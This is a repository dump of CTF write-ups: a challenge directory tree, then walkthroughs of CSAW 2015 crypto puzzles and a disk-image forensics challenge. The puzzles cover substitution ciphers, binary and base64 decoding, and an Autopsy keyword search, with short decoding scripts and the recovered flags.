├── 2015 ├── CSAW-CTF │ ├── Crypto │ │ ├── notesy │ │ │ ├── Images │ │ │ │ ├── notesy.4chars.png │ │ │ │ ├── notesy.5chars.png │ │ │ │ ├── notesy.blank.png │ │ │ │ └── notesy.key.png │ │ │ └── Readme.md │ │ ├── ones_and_zer0es │ │ │ ├── Readme.md │ │ │ └── eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg │ │ ├── whiter0se │ │ │ ├── Readme.md │ │ │ ├── eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v │ │ │ └── quipquip.out.png │ │ └── zer0-day │ │ │ ├── Readme.md │ │ │ └── eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi │ ├── Forensics │ │ ├── Flash │ │ │ ├── Flash option 1.md │ │ │ ├── Flash option 2.md │ │ │ ├── Flash option 3.md │ │ │ ├── Flash option 4.md │ │ │ ├── Images │ │ │ │ ├── CTF1.jpg │ │ │ │ ├── CTF10.jpg │ │ │ │ ├── CTF11.jpg │ │ │ │ ├── CTF12.jpg │ │ │ │ ├── CTF13.jpg │ │ │ │ ├── CTF14.jpg │ │ │ │ ├── CTF15.jpg │ │ │ │ ├── CTF16.jpg │ │ │ │ ├── CTF16A.jpg │ │ │ │ ├── CTF16B.jpg │ │ │ │ ├── CTF17.jpg │ │ │ │ ├── CTF17A.jpg │ │ │ │ ├── CTF17B.jpg │ │ │ │ ├── CTF18.jpg │ │ │ │ ├── CTF19.jpg │ │ │ │ ├── CTF2.jpg │ │ │ │ ├── CTF20.jpg │ │ │ │ ├── CTF3.jpg │ │ │ │ ├── CTF31.jpg │ │ │ │ ├── CTF32.jpg │ │ │ │ ├── CTF33.jpg │ │ │ │ ├── CTF34.jpg │ │ │ │ ├── CTF35.jpg │ │ │ │ ├── CTF4.jpg │ │ │ │ ├── CTF41.jpg │ │ │ │ ├── CTF41A.jpg │ │ │ │ ├── CTF42.jpg │ │ │ │ ├── CTF42A.jpg │ │ │ │ ├── CTF43.jpg │ │ │ │ ├── CTF43A.jpg │ │ │ │ ├── CTF5.jpg │ │ │ │ ├── CTF6.jpg │ │ │ │ ├── CTF7.jpg │ │ │ │ ├── CTF8.jpg │ │ │ │ └── CTF9.jpg │ │ │ └── Readme.md │ │ ├── Keep-Calm-and-CTF │ │ │ ├── Images │ │ │ │ ├── CTF2.jpg │ │ │ │ ├── CTF3.jpg │ │ │ │ └── img.jpg │ │ │ └── Readme.md │ │ └── airport │ │ │ ├── Images │ │ │ ├── 1.png │ │ │ ├── 2.png │ │ │ ├── 3.png │ │ │ ├── 4.png │ │ │ └── steghide.jpg │ │ │ ├── Readme.md │ │ │ └── airport_26321e6eac7a7490e527cbe27ceb68c1.zip │ ├── Recon │ │ ├── Alexander-Taylor │ │ │ ├── Images │ │ │ │ ├── 1.png │ │ │ │ ├── 2.png │ │ │ │ ├── 3.png │ │ │ │ ├── 4.png │ │ │ │ ├── 5.png │ │ │ │ ├── decode.png │ │ │ │ ├── 
enigma.png │ │ │ │ ├── js.png │ │ │ │ ├── linkedin.png │ │ │ │ ├── wcsc.png │ │ │ │ ├── yoshi_forum.png │ │ │ │ └── yoshi_text.png │ │ │ └── Readme.md │ │ ├── Eric-Liang │ │ │ ├── Images │ │ │ │ ├── CSAW.png │ │ │ │ ├── brooklyn.png │ │ │ │ ├── competitors.png │ │ │ │ ├── flag.png │ │ │ │ ├── logo.png │ │ │ │ ├── team_website.png │ │ │ │ └── teams.png │ │ │ └── Readme.md │ │ └── Julian-Cohen │ │ │ ├── Images │ │ │ └── google.png │ │ │ └── Readme.md │ ├── Trivia │ │ └── Readme.md │ └── Web │ │ ├── K_-Stairs │ │ ├── Images │ │ │ ├── bid.png │ │ │ ├── compass.png │ │ │ ├── flag.png │ │ │ ├── hidden.png │ │ │ ├── home.png │ │ │ ├── noop.png │ │ │ ├── register.png │ │ │ ├── stairs.png │ │ │ ├── tokens.png │ │ │ └── tokens_after.png │ │ └── Readme.md │ │ └── Lawn-Care-Simulator │ │ ├── Images │ │ ├── achievement.png │ │ ├── empty.png │ │ ├── flag.png │ │ ├── grass.png │ │ ├── intro.png │ │ └── username.png │ │ └── Readme.md └── PoliCTF │ ├── Grab-Bag │ └── Hard-Interview │ │ ├── IP.tiff │ │ ├── Readme.md │ │ ├── hint.tiff │ │ └── user.tiff │ ├── Reversing │ └── Crack-Me-If-You-Can │ │ ├── Readme.md │ │ ├── crack-me-if-you-can_d4e396383e3f64ec7698efaf42f7f32b.tar.gz.gpg │ │ ├── crackme.py │ │ └── luyten.tiff │ └── Web │ ├── John-the-Referee │ ├── 9.jpg │ ├── Readme.md │ ├── flag.JPG │ ├── main.JPG │ ├── normal.JPG │ └── or_logic.JPG │ └── John-the-Traveller │ ├── 3.jpg │ ├── Crop.tiff │ ├── QR.tiff │ ├── Readme.md │ ├── Traveller.tiff │ ├── Venice.tiff │ ├── block.png │ ├── flag.tiff │ └── px.tiff ├── 2016 ├── BostonKeyParty │ ├── Crypto │ │ └── des-ofb │ │ │ ├── Images │ │ │ └── 601px-OFB_decryption.png │ │ │ ├── Readme.md │ │ │ └── ciphertext │ ├── Misc │ │ └── lily │ │ │ ├── Images │ │ │ └── lily.png │ │ │ ├── Readme.md │ │ │ └── lily.flac │ └── Web │ │ └── Good Morning │ │ ├── Images │ │ ├── monty.png │ │ ├── sjis-kgo.png │ │ └── sjis-request.png │ │ ├── Readme.md │ │ └── release │ │ ├── ganbatte.py │ │ ├── requirements.txt │ │ └── static │ │ ├── favicon.png │ │ ├── 
ganbatte-mayoi.png │ │ ├── index.html │ │ ├── questions.js │ │ └── style.css └── IceCTF │ └── Stage_2 │ └── DearDiary │ ├── Readme.md │ └── deardiary ├── Misc ├── Defcamp CTF 2015 │ └── Misc │ │ └── She said it doesn't matter │ │ ├── Images │ │ ├── flag.png │ │ ├── flag_color.png │ │ ├── m100.png │ │ ├── m101.png │ │ ├── m102.png │ │ └── m102.png.0005.IDAT │ │ └── Readme.md ├── Hack.lu-CTF-2015 │ └── Web │ │ └── Module Loader │ │ ├── Images │ │ ├── flag.png │ │ ├── hidden.png │ │ ├── htaccess.png │ │ ├── lfi.png │ │ ├── main.png │ │ ├── modules.png │ │ └── notthateasy.png │ │ └── Readme.md └── OverTheWire │ ├── Behemoth │ ├── Behemoth0 │ │ ├── Readme.md │ │ └── behemoth0 │ ├── Behemoth1 │ │ ├── Readme.md │ │ └── behemoth1 │ ├── Behemoth2 │ │ ├── Readme.md │ │ └── behemoth2 │ └── Behemoth3 │ │ ├── Readme.md │ │ └── behemoth3 │ └── Narnia │ ├── Naria0 │ ├── Readme.md │ ├── narnia0 │ └── narnia0.c │ ├── Narnia1 │ ├── Readme.md │ ├── narnia1 │ └── narnia1.c │ ├── Narnia2 │ ├── Readme.md │ ├── narnia2 │ └── narnia2.c │ ├── Narnia3 │ ├── Readme.md │ ├── narnia3 │ └── narnia3.c │ ├── Narnia4 │ ├── Readme.md │ ├── narnia4 │ └── narnia4.c │ ├── Narnia5 │ ├── Readme.md │ ├── narnia5 │ └── narnia5.c │ ├── Narnia6 │ ├── Readme.md │ ├── narnia6 │ └── narnia6.c │ ├── Narnia7 │ ├── Readme.md │ ├── narnia7 │ └── narnia7.c │ └── Narnia8 │ ├── Readme.md │ ├── narnia8 │ └── narnia8.c └── README.md /2015/CSAW-CTF/Crypto/notesy/Images/notesy.4chars.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/notesy/Images/notesy.4chars.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/notesy/Images/notesy.5chars.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/notesy/Images/notesy.5chars.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/notesy/Images/notesy.blank.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/notesy/Images/notesy.blank.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/notesy/Images/notesy.key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/notesy/Images/notesy.key.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/notesy/Readme.md: -------------------------------------------------------------------------------- 1 | #notesy 2 | 3 | **Category:** Crypto 4 | **Points:** 100 5 | **Description:** 6 | 7 | http://54.152.6.70/ 8 | 9 | The flag is not in the flag{} format. 10 | 11 | HINT: If you have the ability to encrypt and decrypt, what do you think the flag is? 12 | 13 | HINT: https://www.youtube.com/watch?v=68BjP5f0ccE 14 | 15 | 16 | ##Write-up## 17 | 18 | The link is for a website that has a single text box saying: "Give me like a note dude." If you start typing a red box appears below saying "Your note isn't long enough so it's not security" 19 | 20 | ![notesy blank] 21 | (./Images/notesy.blank.png) 22 | 23 | ![notesy 4 characters] 24 | (./Images/notesy.4chars.png) 25 | 26 | After typing at least 5 characters text shows up below the text box. A single character shows up for every character entered, so after entering 5 characters, 5 show up below. Adding a 6th makes an additional charcter show up. 
After doing some testing I decided position didn't matter and it was a monoalphabetic (single) substitution cipher: each input character always maps to the same output character, regardless of where it sits in the note. 27 | 28 | ![notesy 5 characters] 29 | (./Images/notesy.5chars.png) 30 | 31 | I typed the entire alphabet in to get the key. (With an encryption oracle in front of you this is a one-query chosen-plaintext attack: pushing the whole alphabet through a monoalphabetic substitution hands back the complete key.) I thought the challenge would give some encoded text that translated to something. I tried encoding "flags" and "Your note isn't long enough so it's not security" but neither completed the challenge. The hints weren't there at the time, but it's pretty obvious based on them that you should put the whole key in. I put the key in and completed the challenge. 32 | 33 | ![notesy key] 34 | (./Images/notesy.key.png) 35 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/ones_and_zer0es/Readme.md: -------------------------------------------------------------------------------- 1 | #ones_and_zer0es 2 | 3 | **Category:** Crypto 4 | **Points:** 50 5 | **Description:** NA 6 | 7 | [eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg](eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg) 8 | 9 | ##Write-up## 10 | 11 | This file is ASCII text: 12 | 13 | >``` 14 | root@ctf:~/Downloads/CTF# file eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg 15 | eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg: ASCII text, with very long lines 16 | root@ctf:~/Downloads/CTF# cat eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg 17 | 
01100110011011000110000101110100011110110101000001100101011011110111000001101100011001010010000001100001011011000111011101100001011110010111001100100000011011010110000101101011011001010010000001110100011010000110010100100000011000100110010101110011011101000010000001100101011110000111000001101100011011110110100101110100011100110010111001111101001000000100100100100111011101100110010100100000011011100110010101110110011001010111001000100000011001100110111101110101011011100110010000100000011010010111010000100000011010000110000101110010011001000010000001110100011011110010000001101000011000010110001101101011001000000110110101101111011100110111010000100000011100000110010101101111011100000110110001100101001011100010000001001001011001100010000001111001011011110111010100100000011011000110100101110011011101000110010101101110001000000111010001101111001000000111010001101000011001010110110100101100001000000111011101100001011101000110001101101000001000000111010001101000011001010110110100101100001000000111010001101000011001010110100101110010001000000111011001110101011011000110111001100101011100100110000101100010011010010110110001101001011101000110100101100101011100110010000001100001011100100110010100100000011011000110100101101011011001010010000001100001001000000110111001100101011011110110111000100000011100110110100101100111011011100010000001110011011000110111001001100101011101110110010101100100001000000110100101101110011101000110111100100000011101000110100001100101011010010111001000100000011010000110010101100001011001000111001100101110 18 | 19 | >``` 20 | 21 | The file contains binary text. There are serveral websites such as http://www.binaryhexconverter.com/binary-to-ascii-text-converter that can convert binary text to ascii. 
A better way is a short Python 2 script (note the Python 2 `print` statements): 22 | 23 | >```python 24 | #!/usr/bin/python 25 | import sys 26 | import binascii 27 | for file in sys.argv[1:]: 28 | # open file 29 | with open (file, "r") as myfile: 30 | data=myfile.read().replace('\n', '') 31 | print "### ", file , " convert binary to ascii ###" 32 | n = int(data, 2) 33 | print binascii.unhexlify('%x' % n) 34 | >``` 35 | 36 | One caveat: `'%x' % n` drops leading zero bits, so a message whose first byte is below 0x10 (or that starts with NUL bytes) yields a short or odd-length hex string and `unhexlify` fails with "Odd-length string". Padding to the width implied by the bit count, `binascii.unhexlify('%0*x' % (len(data) // 4, n))`, avoids that; and since `int(data, 2)` rejects anything other than 0 and 1, strip `\r` and spaces as well as `\n` if the file came from Windows. 37 | >``` 38 | root@ctf:~/Downloads/CTF# ./binary.2.ascii.py eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg 39 | ### eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg convert binary to ascii ### 40 | flat{People always make the best exploits.} I've never found it hard to hack most people. If you listen to them, watch them, their vulnerabilities are like a neon sign screwed into their heads. 41 | >``` 42 | 43 | Also notice the flag has a typo as "flat". 44 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/ones_and_zer0es/eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg: -------------------------------------------------------------------------------- 1 | 
01100110011011000110000101110100011110110101000001100101011011110111000001101100011001010010000001100001011011000111011101100001011110010111001100100000011011010110000101101011011001010010000001110100011010000110010100100000011000100110010101110011011101000010000001100101011110000111000001101100011011110110100101110100011100110010111001111101001000000100100100100111011101100110010100100000011011100110010101110110011001010111001000100000011001100110111101110101011011100110010000100000011010010111010000100000011010000110000101110010011001000010000001110100011011110010000001101000011000010110001101101011001000000110110101101111011100110111010000100000011100000110010101101111011100000110110001100101001011100010000001001001011001100010000001111001011011110111010100100000011011000110100101110011011101000110010101101110001000000111010001101111001000000111010001101000011001010110110100101100001000000111011101100001011101000110001101101000001000000111010001101000011001010110110100101100001000000111010001101000011001010110100101110010001000000111011001110101011011000110111001100101011100100110000101100010011010010110110001101001011101000110100101100101011100110010000001100001011100100110010100100000011011000110100101101011011001010010000001100001001000000110111001100101011011110110111000100000011100110110100101100111011011100010000001110011011000110111001001100101011101110110010101100100001000000110100101101110011101000110111100100000011101000110100001100101011010010111001000100000011010000110010101100001011001000111001100101110 2 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/whiter0se/Readme.md: -------------------------------------------------------------------------------- 1 | #whiter0se 2 | 3 | **Category:** Crypto 4 | **Points:** 50 5 | **Description:** Note: The flag is the entire thing decrypted 6 | 7 | 
[eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v](eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v) 8 | 9 | ##Write-up 10 | 11 | Again, the file is ASCII text: 12 | 13 | >``` 14 | root@ctf:~/Downloads/CTF# file eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v 15 | eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v: ASCII text 16 | root@ctf:~/Downloads/CTF# cat eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v 17 | EOY XF, AY VMU M UKFNY TOY YF UFWHYKAXZ EAZZHN. UFWHYKAXZ ZNMXPHN. UFWHYKAXZ EHMOYACOI. VH'JH EHHX CFTOUHP FX VKMY'U AX CNFXY FC OU. EOY VH KMJHX'Y EHHX IFFQAXZ MY VKMY'U MEFJH OU. 18 | >``` 19 | 20 | This looks like a monoalphabetic substitution cipher. A Caesar shift is the simplest special case (the ciphertext alphabet is just the plaintext alphabet rotated), so let's try rot13 first with a perl one-liner: 21 | 22 | >``` 23 | root@ctf:~/Downloads/CTF# perl -lpe 'y/A-Za-z/N-ZA-Mn-za-m/' eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v 24 | RBL KS, NL IZH Z HXSAL GBL LS HSJULXNKM RNMMUA. HSJULXNKM MAZKCUA. HSJULXNKM RUZBLNPBV. IU'WU RUUK PSGBHUC SK IXZL'H NK PASKL SP BH. RBL IU XZWUK'L RUUK VSSDNKM ZL IXZL'H ZRSWU BH. 25 | >``` 26 | 27 | Well, that's unfortunate. There's probably a better automated way to do it, but I just put that command in a shell script 25 times and edited the transliteration ranges for every other possible shift (rot1 through rot25). I'll spare you the agony: none of them worked. 28 | 29 | So now we're dealing with a substitution cipher whose key is an arbitrary permutation of the alphabet rather than a rotation. Brute-forcing 26! keys is out of the question, but the ciphertext keeps its word boundaries and punctuation, so a frequency-analysis / dictionary solver makes short work of it. To the internet! http://quipqiup.com/ 30 | 31 | ![quipquip output] 32 | (./quipquip.out.png) 33 | 34 | 35 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/whiter0se/eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v: -------------------------------------------------------------------------------- 1 | EOY XF, AY VMU M UKFNY TOY YF UFWHYKAXZ EAZZHN. UFWHYKAXZ ZNMXPHN. UFWHYKAXZ EHMOYACOI. VH'JH EHHX CFTOUHP FX VKMY'U AX CNFXY FC OU. EOY VH KMJHX'Y EHHX IFFQAXZ MY VKMY'U MEFJH OU. 
2 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/whiter0se/quipquip.out.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Crypto/whiter0se/quipquip.out.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/zer0-day/Readme.md: -------------------------------------------------------------------------------- 1 | #zer0-day 2 | 3 | **Category:** Crypto 4 | **Points:** 50 5 | **Description:** NA 6 | 7 | [eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi](eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi) 8 | 9 | ##Write-up## 10 | 11 | The eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi file is actually ascii text 12 | 13 | >``` 14 | root@ctf:~/Downloads/CTF# file eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 15 | eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi: ASCII text, with very long lines 16 | root@ctf:~/Downloads/CTF# cat eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 17 | 
RXZpbCBDb3JwLCB3ZSBoYXZlIGRlbGl2ZXJlZCBvbiBvdXIgcHJvbWlzZSBhcyBleHBlY3RlZC4g\nVGhlIHBlb3BsZSBvZiB0aGUgd29ybGQgd2hvIGhhdmUgYmVlbiBlbnNsYXZlZCBieSB5b3UgaGF2\nZSBiZWVuIGZyZWVkLiBZb3VyIGZpbmFuY2lhbCBkYXRhIGhhcyBiZWVuIGRlc3Ryb3llZC4gQW55\nIGF0dGVtcHRzIHRvIHNhbHZhZ2UgaXQgd2lsbCBiZSB1dHRlcmx5IGZ1dGlsZS4gRmFjZSBpdDog\neW91IGhhdmUgYmVlbiBvd25lZC4gV2UgYXQgZnNvY2lldHkgd2lsbCBzbWlsZSBhcyB3ZSB3YXRj\naCB5b3UgYW5kIHlvdXIgZGFyayBzb3VscyBkaWUuIFRoYXQgbWVhbnMgYW55IG1vbmV5IHlvdSBv\nd2UgdGhlc2UgcGlncyBoYXMgYmVlbiBmb3JnaXZlbiBieSB1cywgeW91ciBmcmllbmRzIGF0IGZz\nb2NpZXR5LiBUaGUgbWFya2V0J3Mgb3BlbmluZyBiZWxsIHRoaXMgbW9ybmluZyB3aWxsIGJlIHRo\nZSBmaW5hbCBkZWF0aCBrbmVsbCBvZiBFdmlsIENvcnAuIFdlIGhvcGUgYXMgYSBuZXcgc29jaWV0\neSByaXNlcyBmcm9tIHRoZSBhc2hlcyB0aGF0IHlvdSB3aWxsIGZvcmdlIGEgYmV0dGVyIHdvcmxk\nLiBBIHdvcmxkIHRoYXQgdmFsdWVzIHRoZSBmcmVlIHBlb3BsZSwgYSB3b3JsZCB3aGVyZSBncmVl\nZCBpcyBub3QgZW5jb3VyYWdlZCwgYSB3b3JsZCB0aGF0IGJlbG9uZ3MgdG8gdXMgYWdhaW4sIGEg\nd29ybGQgY2hhbmdlZCBmb3JldmVyLiBBbmQgd2hpbGUgeW91IGRvIHRoYXQsIHJlbWVtYmVyIHRv\nIHJlcGVhdCB0aGVzZSB3b3JkczogImZsYWd7V2UgYXJlIGZzb2NpZXR5LCB3ZSBhcmUgZmluYWxs\neSBmcmVlLCB3ZSBhcmUgZmluYWxseSBhd2FrZSF9Ig== 18 | >``` 19 | 20 | This looks to be base64 encoded but it doesn't decode cleanly: 21 | 22 | >``` 23 | root@ctf:~/Downloads/CTF# base64 -d eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 24 | Evil Corp, we have delivered on our promise as expected. base64: invalid input 25 | >``` 26 | 27 | That's because of the literal `\n` sequences in the file — a backslash followed by the letter n, not real line breaks (`base64 -d` is happy with real newlines, which is why it gets through the first chunk and then reports `invalid input` at the first backslash). You can strip them with sed. Note that `sed -i` rewrites the challenge file in place; to keep the original artifact untouched — a good habit with anything you might later need as evidence — drop `-i` and pipe instead: `sed 's/\\n//g' file | base64 -d`. 28 | 29 | >``` 30 | root@ctf:~/Downloads/CTF# sed -i 's/\\n//g' eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 31 | root@ctf:~/Downloads/CTF# base64 -d eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi 32 | Evil Corp, we have delivered on our promise as expected. The people of the world who have been enslaved by you have been freed. Your financial data has been destroyed. Any attempts to salvage it will be utterly futile. Face it: you have been owned. 
We at fsociety will smile as we watch you and your dark souls die. That means any money you owe these pigs has been forgiven by us, your friends at fsociety. The market's opening bell this morning will be the final death knell of Evil Corp. We hope as a new society rises from the ashes that you will forge a better world. A world that values the free people, a world where greed is not encouraged, a world that belongs to us again, a world changed forever. And while you do that, remember to repeat these words: "flag{We are fsociety, we are finally free, we are finally awake!}" 33 | >``` 34 | 35 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Crypto/zer0-day/eps1.9_zer0-day_b7604a922c8feef666a957933751a074.avi: -------------------------------------------------------------------------------- 1 | RXZpbCBDb3JwLCB3ZSBoYXZlIGRlbGl2ZXJlZCBvbiBvdXIgcHJvbWlzZSBhcyBleHBlY3RlZC4g\nVGhlIHBlb3BsZSBvZiB0aGUgd29ybGQgd2hvIGhhdmUgYmVlbiBlbnNsYXZlZCBieSB5b3UgaGF2\nZSBiZWVuIGZyZWVkLiBZb3VyIGZpbmFuY2lhbCBkYXRhIGhhcyBiZWVuIGRlc3Ryb3llZC4gQW55\nIGF0dGVtcHRzIHRvIHNhbHZhZ2UgaXQgd2lsbCBiZSB1dHRlcmx5IGZ1dGlsZS4gRmFjZSBpdDog\neW91IGhhdmUgYmVlbiBvd25lZC4gV2UgYXQgZnNvY2lldHkgd2lsbCBzbWlsZSBhcyB3ZSB3YXRj\naCB5b3UgYW5kIHlvdXIgZGFyayBzb3VscyBkaWUuIFRoYXQgbWVhbnMgYW55IG1vbmV5IHlvdSBv\nd2UgdGhlc2UgcGlncyBoYXMgYmVlbiBmb3JnaXZlbiBieSB1cywgeW91ciBmcmllbmRzIGF0IGZz\nb2NpZXR5LiBUaGUgbWFya2V0J3Mgb3BlbmluZyBiZWxsIHRoaXMgbW9ybmluZyB3aWxsIGJlIHRo\nZSBmaW5hbCBkZWF0aCBrbmVsbCBvZiBFdmlsIENvcnAuIFdlIGhvcGUgYXMgYSBuZXcgc29jaWV0\neSByaXNlcyBmcm9tIHRoZSBhc2hlcyB0aGF0IHlvdSB3aWxsIGZvcmdlIGEgYmV0dGVyIHdvcmxk\nLiBBIHdvcmxkIHRoYXQgdmFsdWVzIHRoZSBmcmVlIHBlb3BsZSwgYSB3b3JsZCB3aGVyZSBncmVl\nZCBpcyBub3QgZW5jb3VyYWdlZCwgYSB3b3JsZCB0aGF0IGJlbG9uZ3MgdG8gdXMgYWdhaW4sIGEg\nd29ybGQgY2hhbmdlZCBmb3JldmVyLiBBbmQgd2hpbGUgeW91IGRvIHRoYXQsIHJlbWVtYmVyIHRv\nIHJlcGVhdCB0aGVzZSB3b3JkczogImZsYWd7V2UgYXJlIGZzb2NpZXR5LCB3ZSBhcmUgZmluYWxs\neSBmcmVlLCB3ZSBhcmUgZmluYWxseSBhd2FrZSF9Ig== 2 | 
-------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Flash option 1.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a harddrive. Find out what's on it. 8 | 9 | ##Write-up 10 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 11 | 12 | My first step was to download the image file and examine it with standard forensic software. The image file contained approximately 190 files and folders which included several hidden folder/file types. Since we are looking for the 'flag' I created a search operation to be run against all files (including hidden files) to search for the term ‘flag‘. This search returned 397 hits from within 43 files so I knew I needed to narrow the results. 13 | 14 | I created a second search operation to also be run against all files (including hidden files) this time searching for the term ‘flag{‘. This search resulted in one hit within one file and the flag was immediately located in the following hidden file ‘Disk Image\.10\.hidden’ 15 | 16 | The flag recovered to solve this CTF is ```flag{b3l0w_th3_r4dar}``` 17 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Flash option 2.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a hard drive. Find out what's on it. 
8 | 9 | ##Write-up 10 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 11 | 12 | My first step was to download the image file and examine it with the [SANS Investigative Forensic Toolkit](http://digital-forensics.sans.org/community/downloads). The SANS Investigative Forensic Toolkit (SIFT) is a virtual workstation created for incident response and digital forensics use and made available to the whole community as a public service. 13 | ![CTF Image](./Images/CTF1.jpg) 14 | 15 | The first step is to start the forensic application Autopsy installed on the SIFT. 16 | ![CTF Image](./Images/CTF2.jpg) 17 | 18 | Next we want to open a browser on the SIFT with the following URL ```http://localhost:9999/autopsy``` which will take us to the Autopsy main page. 19 | ![CTF Image](./Images/CTF3.jpg) 20 | 21 | Let's click ```New Case``` and populate the fields to create a new Autopsy case. Click ```New Case``` again to complete this step. 22 | ![CTF Image](./Images/CTF4.jpg) 23 | 24 | If this is the first time you have used Autopsy on this system your screen will look like this. Simply leave the name to 'Hidden' and click ```Add Host``` 25 | ![CTF Image](./Images/CTF5.jpg) 26 | 27 | If you have run Autopsy on this system before simply click ```Add Host```. 28 | ![CTF Image](./Images/CTF6.jpg) 29 | 30 | Populate the information and click ```Add Host``` again to complete this step. 31 | ![CTF Image](./Images/CTF7.jpg) 32 | 33 | Click ```Add Image``` 34 | ![CTF Image](./Images/CTF8.jpg) 35 | 36 | Click ```Add Image File``` 37 | ![CTF Image](./Images/CTF9.jpg) 38 | 39 | Enter the full location of the flash image file in the location field and click ```Next``` 40 | ![CTF Image](./Images/CTF10.jpg) 41 | 42 | Leave the settings as they appear - Disk Image, Volume System Type (disk image only): dos. 
Click ```Ok``` 43 | ![CTF Image](./Images/CTF11.jpg) 44 | 45 | Here we don't need to make any changes, just click ```Add``` 46 | ![CTF Image](./Images/CTF12.jpg) 47 | 48 | Just click ```Ok``` 49 | ![CTF Image](./Images/CTF13.jpg) 50 | 51 | On this screen we are going to click ```Analyze```. 52 | ![CTF Image](./Images/CTF14.jpg) 53 | 54 | We want to start with a keyword search so we click on the ```Keyword Search``` button 55 | ![CTF Image](./Images/CTF15.jpg) 56 | 57 | We leave the default options and enter our search term of 'flag' and click ```Search``` 58 | ![CTF Image](./Images/CTF16B.jpg) 59 | 60 | We can see that there were quite a number of search results returned (397 hits for the term 'flag'). Let's click on ```Keyword search``` again and see if we can narrow our results by changing our search parameters. 61 | ![CTF Image](./Images/CTF17B.jpg) 62 | 63 | Let's enter the search term 'flag{', hit ```Keyword search```, and compare the results to the previous search. Including the delimiter is cheap triage: the bare word matches ordinary text all over the image, whereas 'flag{' is specific to the flag format. 64 | ![CTF Image](./Images/CTF18.jpg) 65 | 66 | Now we can see that our results are much smaller. We can see that this time we only have one hit listed. 67 | ![CTF Image](./Images/CTF19.jpg) 68 | 69 | If we click on the link ```Ascii``` we can clearly see the flag - ```flag{b3l0w_th3_r4dar}``` 70 | ![CTF Image](./Images/CTF20.jpg) 71 | 72 | The flag recovered to solve this CTF is ```flag{b3l0w_th3_r4dar}``` 73 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Flash option 3.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a hard drive. Find out what's on it. 
